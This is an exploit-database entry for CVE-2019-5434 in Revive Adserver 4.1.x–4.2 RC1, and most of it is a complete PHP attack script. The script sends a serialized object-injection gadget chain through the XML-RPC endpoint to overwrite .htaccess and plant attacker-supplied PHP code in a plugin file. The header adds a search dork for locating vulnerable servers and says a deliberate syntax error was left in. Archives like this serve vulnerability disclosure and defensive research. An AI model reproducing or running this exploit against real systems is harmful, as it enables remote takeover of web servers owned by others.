Revive Adserver 4.2 - Remote Code Execution

EDB-ID:

47739


Author:

crlf

Type:

webapps


Platform:

PHP

Date:

2019-12-03


# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x <= 4.2 RC1
# Tested on: *nix
# CVE : CVE-2019-5434
# Сontains syntax error for protection against skids


<?php
# Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434)
# coded by @crlf, with love for antichat.com
# special thanks to @Kaimi :)
# the script should be used only for educational purposes!

namespace{
  (!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv);

  $source = 'data:text/html;base64,'.base64_encode('#');
  $destination = 'plugins/.htaccess';
  #$destination = 'var/.htaccess';

  if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));

  $source = 'data:text/html;base64,'.base64_encode($code);
  $destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
  #$destination = 'var/default.conf.php';

  request($url, $source, $destination);
  message('check '.$url.$destination);

  function request($url, $source, $destination){

    $what = serialize(
         ['what' =>
            new Pdp\Uri\Url(
                new League\Flysystem\File( $destination,
                    new League\Flysystem\File( 'x://'.$source,
                        new League\Flysystem\MountManager(
                            new League\Flysystem\Filesystem(
                                new League\Flysystem\Config,
                                new League\Flysystem\Adapter\Local('')
                            ),
                            new League\Flysystem\Plugin\ForcedCopy
                        )
                    )
                )
            )
         ]
     );

    $what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what));

    $xml = '<?xml version="1.0" encoding="ISO-8859-1"?>
              <methodCall>
               <methodName>openads.spc</methodName>
               <params>
                 <param>
                   <value>
                     <struct>
                       <member>
                         <name>remote_addr</name>
                         <value>8.8.8.8</value>
                       </member>
                       <member>
                         <name>cookies</name>
                         <value>
                           <array>
                           </array>
                         </value>
                       </member>
                     </struct>
                   </value>
                 </param>
                 <param><value><string>'.$what.'</string></value></param>
                 <param><value><string>0</string></value></param>
                 <param><value><string>dsad</string></value></param>
                 <param><value><boolean>1</boolean></value></param>
                 <param><value><boolean>0</boolean></value></param>
                 <param><value><boolean>1</boolean></value></param>
               </params>
             </methodCall>';

    return file_get_contents($url.'adxmlrpc.php', false, stream_context_create(
                             ['http' =>
                               ['method' => 'POST',
                                'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0',
                                'header' =>'Content-type: application/x-www-form-urlencoded',
                                'content'=> $xml
                                ]
                             ])
           );
  }

  function message($str){
     print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL;
  }
}

namespace League\Flysystem\Plugin{
  class ForcedCopy{}
}

namespace League\Flysystem{
  class Config{
    protected $settings = [];
    public function __construct(){
       $this->settings = ['disable_asserts' => true];
    }
  }
  class Filesystem{
    protected $adapter;
    protected $config;
     public function __construct($config,$adapter){
       $this->config = $config;
       $this->adapter = $adapter;
     }
  }
  class MountManager{
    protected $filesystems = [];
    protected $plugins = [];
     public function __construct($filesystem, $handler){
       $this->filesystems = ['x' => $filesystem];
       $this->plugins = ['__toString' => $handler];
     }
  }
  class File{
    protected $path;
    protected $filesystem;
    public function __construct($path, $obj){
      $this->filesystem = $obj;
      $this->path = $path;
    }
  }
}

namespace League\Flysystem\Adapter{
  class Local{
    protected $pathPrefix;
    public function __construct($prefix){
       $this->pathPrefix = $prefix;
     }
  }
}

namespace Pdp\Uri{
  class Url{
    private $host;
    public function __construct($file){
      $this->host = $file;
    }
  }
}